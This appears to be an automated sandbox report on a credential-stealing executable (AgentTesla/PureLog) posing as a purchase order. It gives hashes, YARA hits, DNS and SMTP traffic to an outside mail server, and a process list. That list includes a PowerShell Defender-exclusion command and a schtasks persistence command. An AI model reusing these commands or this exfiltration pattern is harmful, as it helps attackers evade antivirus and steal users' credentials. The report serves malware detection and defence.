                                                      MD5:876bdd759d990110a2bbd617b0f2c549
                                                      SHA1:dec55c0273518038e0f2cdabe94d0d33e6fb1704
                                                      SHA256:066beb79d6fc244e4fc3db3cae1af40749798a52f6b5796f14e3612e1498bf73
                                                      SHA512:b3f8f1d0cc8a743e907877e699fedf08fe0482aed2d7902a93497d773978bf01d0e78a81341dcd5a6ff0019cfdf43f1cd68d7952dc9f853b2dd2eecc471a23b6
                                                      SSDEEP:12288:gsJTENl3a+1+UxRhsZzc3LKEUfzPdvpkF55CSuGxCkckJ+ZWsfeXjZ:BxENllxzsZzALKxuHuG7JYWsWXjZ
                                                      TLSH:FEE423AEF39C2340DB7FA3BDA456416402F40CB2ADB0DB0DDD5C19C9772A78C62616A7
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&}...............0.............n7... ...@....@.. ....................................@................................
                                                      Icon Hash:292d296b43a5e54a
                                                      Entrypoint:0x4a376e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xE07D262E [Sat May 7 09:55:58 2089 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa371c | 0x4f | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0xcac | .rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0xc | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa28cc | 0x70 | .text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                      .text | 0x2000 | 0xa1774 | 0xa1800 | 3c54b49f34871711307a25264fcf30cc | False | 0.9851278299148607 | data | 7.990207486581012 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc | 0xa4000 | 0xcac | 0xe00 | a591a6f61e54fc572a10e779fa8c9fdc | False | 0.40122767857142855 | data | 4.842958974175906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc | 0xa6000 | 0xc | 0x200 | 0f4edaaacebd6bd1f905ab022d0be02b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                      RT_ICON | 0xa4130 | 0x658 | Device independent bitmap graphic, 21 x 36 x 32, image size 1584 | | | 0.43903940886699505
                                                      RT_GROUP_ICON | 0xa4788 | 0x14 | data | | | 1.05
                                                      RT_VERSION | 0xa479c | 0x324 | data | | | 0.43034825870646765
                                                      RT_MANIFEST | 0xa4ac0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                      DLL | Import
                                                      mscoree.dll | _CorExeMain
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Mar 14, 2024 17:29:02.701486111 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.701530933 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.874497890 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.874515057 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.875011921 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:02.917819977 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:02.921111107 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.135020018 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.487068892 CET58749733192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.487620115 CET49733587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.489542961 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.663440943 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.663537025 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:03.942075014 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:03.942219973 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.116715908 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.116878033 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.292181969 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.292658091 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.481046915 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481142998 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481193066 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481218100 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481235027 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.481256962 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.481282949 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.483380079 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.658623934 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.659616947 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:04.833197117 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:04.833554983 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.007585049 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.010698080 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.188172102 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.190253973 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.363696098 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.364294052 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.543755054 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.546444893 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.720598936 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.729434013 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729528904 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729579926 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729660034 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729790926 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729888916 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729953051 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.729995012 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.730040073 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:29:05.902865887 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.902925968 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903198004 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903270960 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903462887 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903712034 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.903748989 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.904375076 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:29:05.949049950 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:30:39.996119022 CET49736587192.168.2.4192.254.186.165
                                                      Mar 14, 2024 17:30:40.210159063 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:30:40.559231997 CET58749736192.254.186.165192.168.2.4
                                                      Mar 14, 2024 17:30:40.559906960 CET49736587192.168.2.4192.254.186.165
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 14, 2024 17:28:58.696681023 CET | 50247 | 53 | 192.168.2.4 | 1.1.1.1
Mar 14, 2024 17:28:58.784841061 CET | 53 | 50247 | 1.1.1.1 | 192.168.2.4
Mar 14, 2024 17:28:59.979574919 CET | 59610 | 53 | 192.168.2.4 | 1.1.1.1
Mar 14, 2024 17:29:00.291466951 CET | 53 | 59610 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 14, 2024 17:28:58.696681023 CET | 192.168.2.4 | 1.1.1.1 | 0x71d0 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 14, 2024 17:28:59.979574919 CET | 192.168.2.4 | 1.1.1.1 | 0x5ff6 | Standard query (0) | mail.alltoursegypt.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 14, 2024 17:28:58.784841061 CET | 1.1.1.1 | 192.168.2.4 | 0x71d0 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 17:28:58.784841061 CET | 1.1.1.1 | 192.168.2.4 | 0x71d0 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 17:28:58.784841061 CET | 1.1.1.1 | 192.168.2.4 | 0x71d0 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 17:29:00.291466951 CET | 1.1.1.1 | 192.168.2.4 | 0x5ff6 | No error (0) | mail.alltoursegypt.com | alltoursegypt.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 14, 2024 17:29:00.291466951 CET | 1.1.1.1 | 192.168.2.4 | 0x5ff6 | No error (0) | alltoursegypt.com | | 192.254.186.165 | A (IP address) | IN (0x0001) | false

• api.ipify.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 104.26.12.205 | 443 | 6104 | C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-14 16:28:59 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-03-14 16:28:59 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Thu, 14 Mar 2024 16:28:59 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8645a3d5bf7fc468-EWR
2024-03-14 16:28:59 UTC | 14 | IN | Data Raw: 31 39 31 2e 39 36 2e 32 32 37 2e 31 39 34
    Data Ascii: 191.96.227.194


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Mar 14, 2024 17:29:00.793351889 CET | 587 | 49733 | 192.254.186.165 | 192.168.2.4 | 220-gator3170.hostgator.com ESMTP Exim 4.95 #2 Thu, 14 Mar 2024 11:29:00 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Mar 14, 2024 17:29:00.793579102 CET | 49733 | 587 | 192.168.2.4 | 192.254.186.165 | EHLO 888683
Mar 14, 2024 17:29:00.973495007 CET | 587 | 49733 | 192.254.186.165 | 192.168.2.4 | 250-gator3170.hostgator.com Hello 888683 [191.96.227.194]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Mar 14, 2024 17:29:00.973670006 CET | 49733 | 587 | 192.168.2.4 | 192.254.186.165 | STARTTLS
Mar 14, 2024 17:29:01.148730993 CET | 587 | 49733 | 192.254.186.165 | 192.168.2.4 | 220 TLS go ahead
Mar 14, 2024 17:29:03.942075014 CET | 587 | 49736 | 192.254.186.165 | 192.168.2.4 | 220-gator3170.hostgator.com ESMTP Exim 4.95 #2 Thu, 14 Mar 2024 11:29:03 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Mar 14, 2024 17:29:03.942219973 CET | 49736 | 587 | 192.168.2.4 | 192.254.186.165 | EHLO 888683
Mar 14, 2024 17:29:04.116715908 CET | 587 | 49736 | 192.254.186.165 | 192.168.2.4 | 250-gator3170.hostgator.com Hello 888683 [191.96.227.194]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Mar 14, 2024 17:29:04.116878033 CET | 49736 | 587 | 192.168.2.4 | 192.254.186.165 | STARTTLS
Mar 14, 2024 17:29:04.292181969 CET | 587 | 49736 | 192.254.186.165 | 192.168.2.4 | 220 TLS go ahead


                                                      Target ID:0
                                                      Start time:17:28:55
                                                      Start date:14/03/2024
                                                      Path:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      Imagebase:0x1f0000
                                                      File size:666'112 bytes
                                                      MD5 hash:876BDD759D990110A2BBD617B0F2C549
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      Imagebase:0xda0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp
                                                      Imagebase:0x570000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:17:28:57
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:17:28:59
                                                      Start date:14/03/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff693ab0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:17:28:59
                                                      Start date:14/03/2024
                                                      Path:C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      Imagebase:0x5d0000
                                                      File size:666'112 bytes
                                                      MD5 hash:876BDD759D990110A2BBD617B0F2C549
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.1687399793.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 66%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:9.4%
                                                        Dynamic/Decrypted Code Coverage:93.4%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:61
                                                        Total number of Limit Nodes:1

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$|$$^q
                                                        • API String ID: 0-219893329
                                                        • Opcode ID: 85dc684a94b997dd773aac8fb1b7ff2f669682dfcf2e61afb05835454a281bc6
                                                        • Instruction ID: 9fa4cac98d3ccc4c2434ebffd6e91050d4976dc502d8a665a386307cbe13f421
                                                        • Opcode Fuzzy Hash: 85dc684a94b997dd773aac8fb1b7ff2f669682dfcf2e61afb05835454a281bc6
                                                        • Instruction Fuzzy Hash: CDC1D1B1B002149FDB18AB79985427E7BB3BFC9710F14856EE447EB394CE388D428792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1227 9d6c110-9d6c12d 1228 9d6c12f-9d6c132 1227->1228 1229 9d6c156-9d6c159 1228->1229 1230 9d6c134-9d6c151 1228->1230 1231 9d6c16c-9d6c16f 1229->1231 1232 9d6c15b-9d6c161 1229->1232 1230->1229 1231->1232 1235 9d6c171-9d6c174 1231->1235 1233 9d6c167 1232->1233 1234 9d6c2ac-9d6c2b6 1232->1234 1233->1231 1239 9d6c2bd-9d6c2bf 1234->1239 1237 9d6c176-9d6c17a 1235->1237 1238 9d6c185-9d6c188 1235->1238 1240 9d6c2d6-9d6c2e3 1237->1240 1241 9d6c180 1237->1241 1242 9d6c192-9d6c195 1238->1242 1243 9d6c18a-9d6c18d 1238->1243 1245 9d6c2c4-9d6c2c6 1239->1245 1241->1238 1246 9d6c197-9d6c19a 1242->1246 1247 9d6c1fb-9d6c201 1242->1247 1243->1242 1248 9d6c2cd-9d6c2d0 1245->1248 1249 9d6c2c8 1245->1249 1252 9d6c1a4-9d6c1a7 1246->1252 1253 9d6c19c-9d6c19f 1246->1253 1250 9d6c203 1247->1250 1251 9d6c23b-9d6c241 1247->1251 1248->1228 1248->1240 1249->1248 1256 9d6c208-9d6c20b 1250->1256 1254 9d6c247-9d6c24f 1251->1254 1255 9d6c2e4-9d6c313 1251->1255 1257 9d6c1bd-9d6c1c0 1252->1257 1258 9d6c1a9-9d6c1b8 1252->1258 1253->1252 1254->1255 1259 9d6c255-9d6c262 1254->1259 1279 9d6c31d-9d6c320 1255->1279 1260 9d6c20d-9d6c213 1256->1260 1261 9d6c21a-9d6c21d 1256->1261 1262 9d6c1c2-9d6c1cb 1257->1262 1263 9d6c1cc-9d6c1cf 1257->1263 1258->1257 1259->1255 1266 9d6c268-9d6c26c 1259->1266 1260->1253 1268 9d6c215 1260->1268 1269 9d6c225-9d6c228 1261->1269 1270 9d6c21f-9d6c220 1261->1270 1264 9d6c1d6-9d6c1d9 1263->1264 1265 9d6c1d1-9d6c1d3 1263->1265 1272 9d6c1f6-9d6c1f9 1264->1272 1273 9d6c1db-9d6c1f1 1264->1273 1265->1264 1274 9d6c271-9d6c274 1266->1274 1268->1261 1275 9d6c236-9d6c239 1269->1275 1276 9d6c22a-9d6c231 1269->1276 1270->1269 1272->1247 1272->1256 1273->1272 1277 9d6c276-9d6c28b 1274->1277 1278 9d6c290-9d6c293 1274->1278 1275->1251 1275->1274 1276->1275 1277->1278 1281 9d6c2a7-9d6c2aa 1278->1281 1282 9d6c295-9d6c2a2 1278->1282 1283 9d6c322-9d6c32c 1279->1283 1284 9d6c331-9d6c334 1279->1284 1281->1234 1281->1245 
1282->1281 1283->1284 1286 9d6c356-9d6c359 1284->1286 1287 9d6c336-9d6c33a 1284->1287 1288 9d6c36d-9d6c370 1286->1288 1289 9d6c35b-9d6c362 1286->1289 1292 9d6c340-9d6c348 1287->1292 1293 9d6c40e-9d6c44c 1287->1293 1297 9d6c392-9d6c395 1288->1297 1298 9d6c372-9d6c376 1288->1298 1295 9d6c406-9d6c40d 1289->1295 1296 9d6c368 1289->1296 1292->1293 1294 9d6c34e-9d6c351 1292->1294 1306 9d6c44e-9d6c451 1293->1306 1294->1286 1296->1288 1300 9d6c397-9d6c39e 1297->1300 1301 9d6c39f-9d6c3a2 1297->1301 1298->1293 1299 9d6c37c-9d6c384 1298->1299 1299->1293 1303 9d6c38a-9d6c38d 1299->1303 1304 9d6c3a4-9d6c3b5 1301->1304 1305 9d6c3ba-9d6c3bd 1301->1305 1303->1297 1304->1305 1309 9d6c3d7-9d6c3da 1305->1309 1310 9d6c3bf-9d6c3c3 1305->1310 1307 9d6c457-9d6c5eb 1306->1307 1308 9d6c73a-9d6c73d 1306->1308 1376 9d6c724-9d6c737 1307->1376 1377 9d6c5f1-9d6c5f8 1307->1377 1314 9d6c73f-9d6c746 1308->1314 1315 9d6c74b-9d6c74e 1308->1315 1312 9d6c3f4-9d6c3f6 1309->1312 1313 9d6c3dc-9d6c3e0 1309->1313 1310->1293 1311 9d6c3c5-9d6c3cd 1310->1311 1311->1293 1318 9d6c3cf-9d6c3d2 1311->1318 1320 9d6c3fd-9d6c400 1312->1320 1321 9d6c3f8 1312->1321 1313->1293 1319 9d6c3e2-9d6c3ea 1313->1319 1314->1315 1322 9d6c750-9d6c761 1315->1322 1323 9d6c76c-9d6c76f 1315->1323 1318->1309 1319->1293 1325 9d6c3ec-9d6c3ef 1319->1325 1320->1279 1320->1295 1321->1320 1330 9d6c767 1322->1330 1331 9d6c80c-9d6c81f 1322->1331 1323->1307 1324 9d6c775-9d6c778 1323->1324 1327 9d6c792-9d6c795 1324->1327 1328 9d6c77a-9d6c78b 1324->1328 1325->1312 1332 9d6c797-9d6c79e 1327->1332 1333 9d6c7a3-9d6c7a6 1327->1333 1328->1332 1338 9d6c78d 1328->1338 1330->1323 1332->1333 1336 9d6c7c0-9d6c7c3 1333->1336 1337 9d6c7a8-9d6c7b9 1333->1337 1340 9d6c7c5-9d6c7d6 1336->1340 1341 9d6c7dd-9d6c7e0 1336->1341 1348 9d6c7ef-9d6c800 1337->1348 1349 9d6c7bb 1337->1349 1338->1327 1340->1332 1350 9d6c7d8 1340->1350 1342 9d6c7e2-9d6c7e7 1341->1342 1343 9d6c7ea-9d6c7ed 1341->1343 1342->1343 1347 9d6c807-9d6c80a 1343->1347 1343->1348 1347->1331 1352 
9d6c822-9d6c825 1347->1352 1348->1332 1357 9d6c802 1348->1357 1349->1336 1350->1341 1352->1307 1354 9d6c82b-9d6c82d 1352->1354 1355 9d6c834-9d6c837 1354->1355 1356 9d6c82f 1354->1356 1355->1306 1359 9d6c83d-9d6c846 1355->1359 1356->1355 1357->1347 1378 9d6c5fe-9d6c621 1377->1378 1379 9d6c6ac-9d6c6b3 1377->1379 1388 9d6c629-9d6c631 1378->1388 1379->1376 1380 9d6c6b5-9d6c6e8 1379->1380 1392 9d6c6ed-9d6c71a 1380->1392 1393 9d6c6ea 1380->1393 1389 9d6c636-9d6c677 1388->1389 1390 9d6c633 1388->1390 1401 9d6c68f-9d6c6a0 1389->1401 1402 9d6c679-9d6c68a 1389->1402 1390->1389 1392->1359 1393->1392 1401->1359 1402->1359
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 9d99a9d450528fab0e1f76ae9cd2850c4946b903a225f50abdc0300646792d16
                                                        • Instruction ID: f11ee05acaaa93ad771b2cba1a1a28d432cf2b5f76a54f148a20ae0582ea8391
                                                        • Opcode Fuzzy Hash: 9d99a9d450528fab0e1f76ae9cd2850c4946b903a225f50abdc0300646792d16
                                                        • Instruction Fuzzy Hash: 7922C035E402048FDB24DFB4C4916AEBBB2EF89310F208469E989EB764D735DD46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
